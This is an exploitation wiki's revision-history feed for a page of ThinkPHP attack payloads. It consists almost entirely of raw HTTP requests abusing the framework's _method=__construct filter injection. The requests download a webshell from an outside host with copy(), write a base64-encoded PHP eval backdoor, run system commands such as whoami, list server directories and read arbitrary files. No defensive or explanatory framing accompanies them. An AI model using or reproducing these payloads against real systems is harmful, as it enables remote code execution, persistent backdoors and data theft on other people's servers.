https://pwnwiki.com/index.php?action=history&feed=atom&title=ThinkPHP_Payload
ThinkPHP Payload - Revision history
2026-04-16T03:19:54Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=ThinkPHP_Payload&diff=1658&oldid=prev
Pwnwiki: Created page with "<pre> POST /index.php?s=captcha&&Fuck=copy(%22http://www.o2oxy.cn/webshell/ali.txt%22,%22test.php%22) HTTP/1.1 Host: aaa.kkt99.top Content-Length: 76 Cache-Control: max-age=0..."
2021-04-14T08:26:11Z
<p>Created page with "<pre> POST /index.php?s=captcha&&Fuck=copy(%22http://www.o2oxy.cn/webshell/ali.txt%22,%22test.php%22) HTTP/1.1 Host: aaa.kkt99.top Content-Length: 76 Cache-Control: max-age=0..."</p>
<p><b>New page</b></p><div><pre><br />
POST /index.php?s=captcha&&Fuck=copy(%22http://www.o2oxy.cn/webshell/ali.txt%22,%22test.php%22) HTTP/1.1<br />
Host: aaa.kkt99.top<br />
Content-Length: 76<br />
Cache-Control: max-age=0<br />
Origin: null<br />
Content-Type: application/x-www-form-urlencoded<br />
Upgrade-Insecure-Requests: 1<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8<br />
Cookie: PHPSESSID=15c58ldpm65a12094fik2aul60; UM_distinctid=16ec5c84963499-0179aed780904e-2393f61-384000-16ec5c8496494d; CNZZDATA1271205468=1873186741-1575275639-%7C1575275639<br />
Connection: close<br />
<br />
_method=__construct&filter=assert&method=GET&server%5BREQUEST_METHOD%5D=Fuck<br />
</pre><br />
<br />
<pre><br />
_method=construct&filter[]=assert&filter[]=file_put_contents('0.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWyczNjB2ZXJ5J107ZXZhbCgkcGFzcyk7Pz4='))&server=-1<br />
<br />
_method=__construct&filter[]=system&method=GET&get[]=whoami<br />
<br />
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo <br />
or<br />
_method=__construct&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo<br />
</pre><br />
<br />
PHP 7.4 Getshell:<br />
<br />
<pre><br />
POST /%3f><%3fphp%20eval($_GET[1]);%3f>/controller/Index.php?1=phpinfo(); HTTP/1.1<br />
Host: 192.168.0.103:8181<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8<br />
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application<br />
Connection: close<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 123<br />
<br />
_method=__construct&method=GET&server[]=1&filter[]=think\Build::module&get[]=index//../../public//?><?php eval($_GET[1]);?><br />
</pre><br />
<br />
<br />
列舉目標:<br />
<pre><br />
POST /index.php?s=captcha&&Fuck=12312 HTTP/1.1<br />
Host: 192.168.0.103:8181<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8<br />
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application<br />
Connection: close<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 102<br />
<br />
_method=__construct&filter[]=scandir&filter[]=var_dump&method=GET&get[]=/www/wwwroot/adada.com/public/<br />
</pre><br />
<br />
<br />
PHP7.4任意文件讀取:<br />
<pre><br />
POST /index.php?s=captcha&&Fuck=12312 HTTP/1.1<br />
Host: 192.168.0.103:8181<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8<br />
Cookie: SESSIONID=3a35a215-0d78-4e0d-b29a-f594cec0643e.oEaOgOXgXGAnM_SJalUzD3GdPVI; request_token=zIp1m3C2P5b6U1D4RDCA5kDI8fGzifieXB3jp8oDfrwKLo5Z; ltd_end=-1; pro_end=0; serverType=nginx; order=id%20desc; memSize=1800; distribution=centos8; sites_path=/www/wwwroot; force=0; load_page=null; load_search=undefined; softType=5; load_type=5; p5=nullnot_load; uploadSize=1073741824; rank=a; layers=2; Path=/www/wwwroot/adada.com/application<br />
Connection: close<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 100<br />
<br />
_method=__construct&filter[]=highlight_file&method=GET&get[]=/www/wwwroot/adada.com/public/index.php<br />
</pre></div>
Pwnwiki